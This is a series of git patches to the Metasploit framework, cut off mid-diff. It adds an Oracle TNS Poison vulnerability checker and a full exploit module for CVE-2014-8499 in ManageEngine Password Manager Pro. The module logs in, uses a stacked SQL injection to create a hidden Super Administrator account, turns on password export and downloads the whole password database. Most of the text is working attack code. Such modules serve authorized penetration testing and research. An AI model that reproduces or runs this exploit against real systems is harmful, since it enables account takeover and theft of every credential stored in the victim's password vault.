From 22aabc780599ae18157ef6a61edcfd8abadb5f1c Mon Sep 17 00:00:00 2001 From: Nikita Date: Mon, 13 Oct 2014 12:21:07 +0400 Subject: [PATCH 01/38] Add new module to test TNS poison This module simply checks the server for vulnerabilities like TNS Poison --- .../scanner/oracle/tnspoison_checker.rb | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/scanner/oracle/tnspoison_checker.rb diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb new file mode 100644 index 0000000000..4baa6684b4 --- /dev/null +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -0,0 +1,54 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::TNS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Poison Oracle TNS Listener', + 'Description' => %q{ + This module simply checks the server for vulnerabilities like TNS Poison. + }, + 'Author' => ['ir0njaw'], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Oct 12 2014')) + + register_options( + [ + Opt::RPORT(1521) + ], self.class) + + deregister_options('RHOST') + end + + def run_host(ip) + begin + connect + + pkt = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))") + sock.put(pkt) + a= sock.read(100) + + flag = a.include? "(ERROR_STACK=(ERROR=" + if (flag==true) then print_error ip+" is not vulnerable" + else print_good ip+" is vulnerable" + end + + rescue ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{ip} unable to connect to the server") + + + rescue ::Rex::ConnectionError + rescue ::Errno::EPIPE + + end + end +end From 1996886ae91f19686b19ca07436d21d5e01c2281 Mon Sep 17 00:00:00 2001 From: Nikita Date: Mon, 13 Oct 2014 12:53:39 +0400 Subject: [PATCH 02/38] Update tnspoison_checker.rb --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 4baa6684b4..075df7e05b 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -13,11 +13,12 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Poison Oracle TNS Listener', + 'Name' => 'Oracle TNS Poison vulnerability', 'Description' => %q{ This module simply checks the server for vulnerabilities like TNS Poison. }, - 'Author' => ['ir0njaw'], + 'Author' => ['ir0njaw (Kelesis Nikita'], + 'Company' => ['Digital Security - http://dsec.ru'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 12 2014')) From 621b9523b1aa3ccaa5d502fda994e2d683a622d1 Mon Sep 17 00:00:00 2001 From: Nikita Date: Mon, 13 Oct 2014 22:05:08 +0400 Subject: [PATCH 03/38] Update tnspoison_checker.rb --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 075df7e05b..8f22c55533 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module simply checks the server for vulnerabilities like TNS Poison. }, - 'Author' => ['ir0njaw (Kelesis Nikita'], + 'Author' => ['ir0njaw (Kelesis Nikita)'], 'Company' => ['Digital Security - http://dsec.ru'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 12 2014')) From 2843437ca998914e4ae28523e9c0c4c2793c8d00 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Sat, 8 Nov 2014 11:24:50 +0000 Subject: [PATCH 04/38] Create exploit for CVE-2014-8499 --- .../admin/http/manageengine_pmp_sadmin.rb | 317 ++++++++++++++++++ 1 file changed, 317 insertions(+) create mode 100644 modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb diff --git a/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb b/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb new file mode 100644 index 0000000000..8f016b0901 --- /dev/null +++ b/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb @@ -0,0 +1,317 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine Password Manager Pro Super Administrator Account Creation and Password DB Retrieval', + 'Description' => %q{ + ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection + vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate + privileges and obtain Super Administrator access. A Super Administrator can then + use its privileges to dump the whole password database in CSV format. + PMP can use both MySQL and PostgreSQL databases but this module only exploits the + latter as MySQL does not support stacked queries with Java. + PostgreSQL is the default database in v6.8 and above, but older PMP versions can + be upgraded and continue using MySQL, so a higher version does not guarantee + exploitability. + This module has been tested on v6.8 to v7.1 build 7104 on both Windows and Linux. + The vulnerability is fixed in v7.1 build 7105 and above. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2014-8499' ], + [ 'OSVDB', 'TODO' ], + [ 'URL', 'TODO_GITHUB_URL' ], + [ 'URL', 'TODO_FULLDISC_URL' ] + ], + 'DisclosureDate' => 'Nov 8 2014')) + + register_options( + [ + OptPort.new('RPORT', + [true, 'The target port', 7272]), + OptBool.new('SSL', + [true, 'Use SSL', true]), + OptString.new('USERNAME', + [true, 'The username to login as', 'guest']), + OptString.new('PASSWORD', + [true, 'Password for the specified username', 'guest']), + OptString.new('TARGETURI', [ true, "Password Manager Pro application URI", '/']) + ], self.class) + end + + + def login(username, password) + # 1st step: we obtain a JSESSIONID cookie... + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc') + }) + + if res and res.code == 200 + # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions) + if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ + orgn_name = $1 + else + orgn_name = nil + end + + if res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/ + authrule_name = $1 + else + authrule_name = nil + end + + # 3rd step: we try to get the domainName for the user + cookie = res.get_cookies + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], 'login', 'AjaxResponse.jsp'), + 'ctype' => "application/x-www-form-urlencoded", + 'cookie' => cookie, + 'vars_get' => { + 'RequestType' => 'GetUserDomainName', + 'userName' => username + } + }) + if res and res.code == 200 + domain_name = res.body.to_s.strip + else + domain_name = nil + end + + # 4th step: authenticate to j_security_check, follow the redirect to PassTrixMain.cc and get its cookies. + # For some reason send_request_cgi! doesn't work, so follow the redirect manually... + vars_post = { + 'j_username' => username, + 'username' => username, + 'j_password' => password + } + vars_post['ORGN_NAME'] = orgn_name if orgn_name + vars_post['AUTHRULE_NAME'] = authrule_name if authrule_name + vars_post['domainName'] = domain_name if domain_name + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], 'j_security_check;' + cookie.to_s.gsub(';','')), + 'ctype' => "application/x-www-form-urlencoded", + 'cookie' => cookie, + 'vars_post' => vars_post + }) + if res and res.code == 302 + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc'), + 'cookie' => cookie, + }) + + if res and res.code == 200 + # 5th step: get the c ookies sent in the last response + return res.get_cookies + end + end + end + return nil + end + + + def inject_sql(old_style) + # On versions older than 7000 the injection is slightly different (we call it "old style"). + # For "new style" versions we can escalate to super admin by doing + # "update aaaauthorizedrole set role_id=1 where account_id=#{user_id};insert into ptrx_superadmin values (#{user_id},true);" + # However for code simplicity let's just create a brand new user which works for both "old style" and "new style" versions. + if old_style + sqli_prefix = '\\\'))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";" + else + sqli_prefix = '\\\'))))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") AS Ptrx_DummyPwds GROUP BY "PTRX_RID","PTRX_RNAME","PTRX_DESC","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";" + end + + user_id = Rex::Text.rand_text_numeric(4) + time = Rex::Text.rand_text_numeric(8) + username = Rex::Text.rand_text_alpha_lower(6) + username_chr = "" + username.each_char do |c| + username_chr << 'chr(' << c.ord.to_s << ')||' + end + username_chr.chop!.chop! + + password = Rex::Text.rand_text_alphanumeric(10) + password_chr = "" + password.each_char do |c| + password_chr << 'chr(' << c.ord.to_s << ')||' + end + password_chr.chop!.chop! + + group_chr = "" + 'Default Group'.each_char do |c| + group_chr << 'chr(' << c.ord.to_s << ')||' + end + group_chr.chop!.chop! + + sqli_command = + "insert into aaauser values (#{user_id},$$$$,$$$$,$$$$,#{time},$$$$);" + + "insert into aaapassword values (#{user_id},#{password_chr},$$$$,0,2,1,#{time});" + + "insert into aaauserstatus values (#{user_id},$$ACTIVE$$,#{time});" + + "insert into aaalogin values (#{user_id},#{user_id},#{username_chr});" + + "insert into aaaaccount values (#{user_id},#{user_id},1,1,#{time});" + + "insert into aaaauthorizedrole values (#{user_id},1);" + + "insert into aaaaccountstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" + + "insert into aaapasswordstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" + + "insert into aaaaccadminprofile values (#{user_id},$$" + Rex::Text.rand_text_alpha_upper(8) + "$$,-1,-1,-1,-1,-1,false,-1,-1,-1,$$$$);" + + "insert into aaaaccpassword values (#{user_id},#{user_id});" + + "insert into ptrx_resourcegroup values (#{user_id},3,#{user_id},0,0,0,0,#{group_chr},$$$$);" + + "insert into ptrx_superadmin values (#{user_id},true);" + sqli_suffix = "-- " + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], "SQLAdvancedALSearchResult.cc"), + 'cookie' => @cookie, + 'vars_post' => { + 'COUNT' => Rex::Text.rand_text_numeric(2), + 'SEARCH_ALL' => sqli_prefix + sqli_command + sqli_suffix, + 'USERID' => Rex::Text.rand_text_numeric(4) + } + }) + + return [ username, password ] + end + + + def get_version + res = send_request_cgi({ + 'uri' => normalize_uri("PassTrixMain.cc"), + 'method' => 'GET' + }) + if res && res.code == 200 && + res.body.to_s =~ /ManageEngine Password Manager Pro/ && + ( + res.body.to_s =~ /login\.css\?([0-9]+)/ || # PMP v6 + res.body.to_s =~ /login\.css\?version=([0-9]+)/ || # PMP v6 + res.body.to_s =~ /\/themes\/passtrix\/V([0-9]+)\/styles\/login\.css"/ # PMP v7 + ) + return $1.to_i + else + return 9999 + end + end + + + def check + version = get_version + case version + when 0..7104 + return Exploit::CheckCode::Appears + when 7105..9998 + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Unknown + end + end + + + def run + version = get_version + @cookie = login(datastore['USERNAME'], datastore['PASSWORD']) + if @cookie == nil + fail_with(Failure::Unknown, "#{peer} - Failed to authenticate.") + end + + creds = inject_sql(version < 7000 ? true : false) + username = creds[0] + password = creds[1] + print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") + + cookie_su = login(username, password) + if cookie_su != nil + + # 1st we turn on password exports + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], 'ConfigureOffline.ve'), + 'cookie' => cookie_su, + 'vars_post' => { + 'IS_XLS' => 'true', + 'includePasswd' => 'true', + 'HOMETAB' => 'true', + 'RESTAB' => 'true', + 'RGTAB' => 'true', + 'PASSWD_RULE' => 'Offline Password File', + 'LOGOUT_TIME' => '20' + } + }) + + # now get the loot! + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'cookie' => cookie_su, + 'vars_get' => { + 'RequestType' => 'ExportResources' + } + }) + if res and res.code == 200 and res.body.to_s.length > 0 + vprint_line(res.body.to_s) + print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + loot_name = 'manageengine.passwordmanagerpro.password.db' + loot_type = 'text/csv' + loot_filename = 'manageengine_pmp_password_db.csv' + loot_desc = 'ManageEngine Password Manager Pro Password DB' + p = store_loot( + loot_name, + loot_type, + rhost, + res.body, + loot_filename, + loot_desc) + print_status "Password database saved in: #{p}" + else + print_error("#{peer} - Failed to export Password Manager Pro passwords.") + end + status = Metasploit::Model::Login::Status::SUCCESSFUL + else + print_error("#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") + status = Metasploit::Model::Login::Status::DENIED_ACCESS + end + + service_data = { + address: rhost, + port: rport, + service_name: 'https', + protocol: 'tcp', + workspace_id: myworkspace_id + } + credential_data = { + origin_type: :service, + module_fullname: self.fullname, + private_type: :password, + private_data: username, + username: password + } + + credential_data.merge!(service_data) + credential_core = create_credential(credential_data) + login_data = { + core: credential_core, + access_level: 'Super Administrator', + status: status, + last_attempted_at: DateTime.now + } + login_data.merge!(service_data) + create_credential_login(login_data) + end +end From 143033f6571ece11a313fc078965e9e604ed5472 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Sat, 8 Nov 2014 11:28:04 +0000 Subject: [PATCH 05/38] Rename manageengine_pmp_sadmin.rb to manageengine_pmp_privesc.rb --- .../{manageengine_pmp_sadmin.rb => manageengine_pmp_privesc.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/admin/http/{manageengine_pmp_sadmin.rb => manageengine_pmp_privesc.rb} (100%) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb similarity index 100% rename from modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb rename to modules/auxiliary/admin/http/manageengine_pmp_privesc.rb From f680b666c735dfa2acf5926b9d8c857059914c5e Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Sat, 8 Nov 2014 11:29:36 +0000 Subject: [PATCH 06/38] Add github adv URL --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 8f016b0901..5e850b7be1 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'CVE', '2014-8499' ], [ 'OSVDB', 'TODO' ], - [ 'URL', 'TODO_GITHUB_URL' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], [ 'URL', 'TODO_FULLDISC_URL' ] ], 'DisclosureDate' => 'Nov 8 2014')) From b3c27452cd849d4799d7f6bfa0c4f9c3f09e79c8 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Sun, 9 Nov 2014 10:40:41 +0000 Subject: [PATCH 07/38] Add full disclosure URL --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5e850b7be1..ea38702005 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2014-8499' ], [ 'OSVDB', 'TODO' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], - [ 'URL', 'TODO_FULLDISC_URL' ] + [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ] ], 'DisclosureDate' => 'Nov 8 2014')) From eb36a36272efabbb0c85cb84b42b07aa01885150 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:40:22 -0600 Subject: [PATCH 08/38] Change title --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index ea38702005..5033addf57 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ManageEngine Password Manager Pro Super Administrator Account Creation and Password DB Retrieval', + 'Name' => 'ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection', 'Description' => %q{ ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'CVE', '2014-8499' ], - [ 'OSVDB', 'TODO' ], + #[ 'OSVDB', 'TODO' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ] ], From 8ddd6a465512d2fd9d8dbc871b37242849d631ff Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:42:30 -0600 Subject: [PATCH 09/38] Redefine RPORT having into account it is builtin --- .../admin/http/manageengine_pmp_privesc.rb | 27 ++++++++----------- 1 file changed, 11 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5033addf57..1422378db5 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -17,14 +17,13 @@ class Metasploit3 < Msf::Auxiliary ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate privileges and obtain Super Administrator access. A Super Administrator can then - use its privileges to dump the whole password database in CSV format. - PMP can use both MySQL and PostgreSQL databases but this module only exploits the - latter as MySQL does not support stacked queries with Java. - PostgreSQL is the default database in v6.8 and above, but older PMP versions can - be upgraded and continue using MySQL, so a higher version does not guarantee - exploitability. - This module has been tested on v6.8 to v7.1 build 7104 on both Windows and Linux. - The vulnerability is fixed in v7.1 build 7105 and above. + use its privileges to dump the whole password database in CSV format. PMP can use + both MySQL and PostgreSQL databases but this module only exploits the latter as + MySQL does not support stacked queries with Java. PostgreSQL is the default database + in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL, + so a higher version does not guarantee exploitability. This module has been tested + on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in + v7.1 build 7105 and above. }, 'Author' => [ @@ -42,14 +41,10 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptPort.new('RPORT', - [true, 'The target port', 7272]), - OptBool.new('SSL', - [true, 'Use SSL', true]), - OptString.new('USERNAME', - [true, 'The username to login as', 'guest']), - OptString.new('PASSWORD', - [true, 'Password for the specified username', 'guest']), + Opt::RPORT(7272), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'The username to login as', 'guest']), + OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']), OptString.new('TARGETURI', [ true, "Password Manager Pro application URI", '/']) ], self.class) end From ee4924582a18c1fdfbf5e83fbf835a6eceb93d22 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:43:44 -0600 Subject: [PATCH 10/38] Use target_uri --- .../admin/http/manageengine_pmp_privesc.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 1422378db5..d8e1e059c2 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary # 1st step: we obtain a JSESSIONID cookie... res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc') + 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc') }) if res and res.code == 200 @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary cookie = res.get_cookies res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], 'login', 'AjaxResponse.jsp'), + 'uri' => normalize_uri(target_uri.path, 'login', 'AjaxResponse.jsp'), 'ctype' => "application/x-www-form-urlencoded", 'cookie' => cookie, 'vars_get' => { @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], 'j_security_check;' + cookie.to_s.gsub(';','')), + 'uri' => normalize_uri(target_uri.path, 'j_security_check;' + cookie.to_s.gsub(';','')), 'ctype' => "application/x-www-form-urlencoded", 'cookie' => cookie, 'vars_post' => vars_post @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 302 res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc'), + 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc'), 'cookie' => cookie, }) @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], "SQLAdvancedALSearchResult.cc"), + 'uri' => normalize_uri(target_uri.path, "SQLAdvancedALSearchResult.cc"), 'cookie' => @cookie, 'vars_post' => { 'COUNT' => Rex::Text.rand_text_numeric(2), @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # 1st we turn on password exports send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], 'ConfigureOffline.ve'), + 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), 'cookie' => cookie_su, 'vars_post' => { 'IS_XLS' => 'true', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Auxiliary # now get the loot! res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['TARGETURI'], 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), 'cookie' => cookie_su, 'vars_get' => { 'RequestType' => 'ExportResources' From 8b8ab61e3d575ff3a838cd9eadf39bdef1a74e63 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:45:12 -0600 Subject: [PATCH 11/38] Favor && over and --- .../auxiliary/admin/http/manageengine_pmp_privesc.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index d8e1e059c2..ae6517d5fd 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc') }) - if res and res.code == 200 + if res && res.code == 200 # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions) if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ orgn_name = $1 @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary 'userName' => username } }) - if res and res.code == 200 + if res && res.code == 200 domain_name = res.body.to_s.strip else domain_name = nil @@ -107,14 +107,14 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => cookie, 'vars_post' => vars_post }) - if res and res.code == 302 + if res && res.code == 302 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc'), 'cookie' => cookie, }) - if res and res.code == 200 + if res && res.code == 200 # 5th step: get the c ookies sent in the last response return res.get_cookies end @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary 'RequestType' => 'ExportResources' } }) - if res and res.code == 200 and res.body.to_s.length > 0 + if res && res.code == 200 && res.body.to_s.length > 0 vprint_line(res.body.to_s) print_good("#{peer} - Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' From 2236518694142b2a6033dd675ab83277605dff36 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:47:05 -0600 Subject: [PATCH 12/38] Check res.body before accessing #to_s --- .../auxiliary/admin/http/manageengine_pmp_privesc.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index ae6517d5fd..c39efd7c76 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -59,13 +59,13 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions) - if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ + if res.body && res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ orgn_name = $1 else orgn_name = nil end - if res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/ + if res.body && res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/ authrule_name = $1 else authrule_name = nil @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary 'userName' => username } }) - if res && res.code == 200 + if res && res.code == 200 && res.body domain_name = res.body.to_s.strip else domain_name = nil @@ -192,7 +192,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => normalize_uri("PassTrixMain.cc"), 'method' => 'GET' }) - if res && res.code == 200 && + if res && res.code == 200 && res.body && res.body.to_s =~ /ManageEngine Password Manager Pro/ && ( res.body.to_s =~ /login\.css\?([0-9]+)/ || # PMP v6 @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary 'RequestType' => 'ExportResources' } }) - if res && res.code == 200 && res.body.to_s.length > 0 + if res && res.code == 200 && res.body && res.body.to_s.length > 0 vprint_line(res.body.to_s) print_good("#{peer} - Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' From 9c033492d24f329517964cbec692b353ffb257d2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:48:22 -0600 Subject: [PATCH 13/38] Fix indentation --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index c39efd7c76..4cceb67f2b 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -189,9 +189,9 @@ class Metasploit3 < Msf::Auxiliary def get_version res = send_request_cgi({ - 'uri' => normalize_uri("PassTrixMain.cc"), - 